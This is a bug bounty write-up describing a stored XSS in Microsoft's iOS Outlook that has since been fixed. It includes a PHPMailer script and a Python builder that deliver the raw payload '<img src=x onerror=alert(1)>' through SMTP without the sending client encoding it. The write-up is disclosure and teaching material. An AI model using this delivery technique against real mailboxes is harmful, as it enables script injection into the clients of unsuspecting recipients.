iOS Outlook Stored XSS Write-Up($3000)

kminthein
Published in qwerty
May 28, 2020

Staying at home has been a real nightmare for me, and I am bored enough to want to learn new things. So I decided to write up how I found a stored XSS in Microsoft Outlook and earned a $3000 bounty for it.

I stopped hunting bugs about three years ago, after collecting bounties from Yahoo, Tumblr and others. A few months ago an old payload I had once tested against Shopify popped up in my Microsoft Outlook inbox. So I started digging: I sent every XSS payload I had, including polyglots, to my Microsoft account, but nothing fired an alert. After hours of struggling I reported it to MSRC with the message below, lol. I thought I was an idiot.

As expected, MSRC replied that they needed more information. I knew there was an XSS bug in Microsoft Outlook; I just had not found the endpoint. After a few more hours of thinking, I asked myself: what if the email client I was sending from validates and encodes my payload before it ever leaves? If the payload is normalized on the sender side, there is nothing left to trigger on the receiver side, which is Microsoft Outlook. So I decided to write a simple PHP script that hands the raw HTML body to an SMTP server directly, with no mail client in between to encode it.

The script I used to send the XSS payload to Outlook is below. It uses PHPMailer, authenticating to Gmail's SMTP submission port over STARTTLS, and sets the HTML body verbatim:

<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;

require 'vendor/autoload.php';

// Passing true enables exceptions so a failed send is reported in the catch block
$mail = new PHPMailer(true);
try {
    // Server settings: submit through Gmail's SMTP server on port 587 with STARTTLS
    $mail->SMTPDebug = 2;                      // print the full client/server SMTP transcript
    $mail->isSMTP();
    $mail->Host = 'smtp.gmail.com';
    $mail->SMTPAuth = true;
    $mail->Username = 'mymail@gmail.com';
    $mail->Password = 'mypassword';
    $mail->SMTPSecure = 'tls';
    $mail->Port = 587;
    // Recipients
    $mail->setFrom('mymail@gmail.com', 'kmt');
    $mail->addAddress('receiver@outlook.com', '');
    // Content: PHPMailer sends the HTML body exactly as given, so nothing
    // entity-encodes the payload before it reaches the receiving mailbox
    $mail->isHTML(true);
    $mail->Subject = 'XSS POC';
    $mail->Body = "<img src=x onerror=alert(1)>";
    $mail->send();
    echo 'Message has been sent';
} catch (Exception $e) {
    echo 'Message could not be sent. Mailer Error: ', $mail->ErrorInfo;
}
?>
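Before blaming the receiving side, it is worth checking what the sender actually puts on the wire. The following is an added example, not the author's script: it builds the same kind of multipart mail in Python's standard library, extracts the text/html part as a receiver would, and contrasts it with what a composer that entity-encodes user text would have sent instead. The addresses, host and credentials are hypothetical placeholders; the send() helper is defined but never called, so the block runs offline.

```python
import html
import smtplib
from email.message import EmailMessage

# Constructed payload, the same markup the PHP script above sends.
PAYLOAD = "<img src=x onerror=alert(1)>"


def build_poc_message(sender, recipient, payload=PAYLOAD):
    """Build a multipart/alternative mail whose text/html part carries the
    payload byte-for-byte. EmailMessage never HTML-encodes what it is handed,
    unlike a desktop or webmail composer that re-serialises rich text."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "XSS POC"
    msg.set_content("XSS POC (plain-text fallback)")
    msg.add_alternative(f"<html><body>{payload}</body></html>", subtype="html")
    return msg


def html_part(msg):
    """Return the decoded text/html body, as a receiving client would render it,
    or None if the message has no HTML part."""
    part = msg.get_body(preferencelist=("html",))
    return None if part is None else part.get_content()


def payload_survives(msg, payload=PAYLOAD):
    """True when the HTML part still contains the raw markup, i.e. nothing on
    the sending side entity-encoded it."""
    body = html_part(msg)
    return body is not None and payload in body


def on_wire_contains(msg, payload=PAYLOAD):
    """True when the serialised RFC 5322 message (what the SMTP server sees)
    contains the payload verbatim; with an ASCII body there is no transfer
    encoding to hide it."""
    return payload in msg.as_string()


def sanitising_client_would_send(payload=PAYLOAD):
    """What a composer that escapes user text produces: inert entities that
    no receiver will ever execute."""
    return html.escape(payload, quote=True)


def send(msg, host, port, username, password):
    """Submit over SMTP with STARTTLS (hypothetical credentials; not called here)."""
    with smtplib.SMTP(host, port) as smtp:
        smtp.starttls()
        smtp.login(username, password)
        smtp.send_message(msg)


if __name__ == "__main__":
    # Hypothetical addresses; nothing is sent.
    msg = build_poc_message("mymail@example.com", "receiver@example.com")
    print(msg.as_string())
    print("payload intact in HTML part:", payload_survives(msg))
    print("payload intact on the wire:", on_wire_contains(msg))
    print("what an encoding client sends:", sanitising_client_would_send())
```

If the escaped form is what your normal client emits, the receiver never had a chance to fail; only a raw-body submission like this one (or the PHPMailer script) actually tests the receiving side's HTML sanitizer.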

After running the script and watching my Outlook mailbox: boom, XSS. Office 365 appeared to be affected as well.

You can view the PoC video here.

After the bug was fixed, I was awarded $3000 by MSRC.

Conclusion

In the scenario above, I strongly believe my sending email client encoded the payload before it reached Outlook, which is why no XSS fired through the normal client. So I chose to write a simple PHP script with PHPMailer, which hands the HTML body to the SMTP server verbatim.
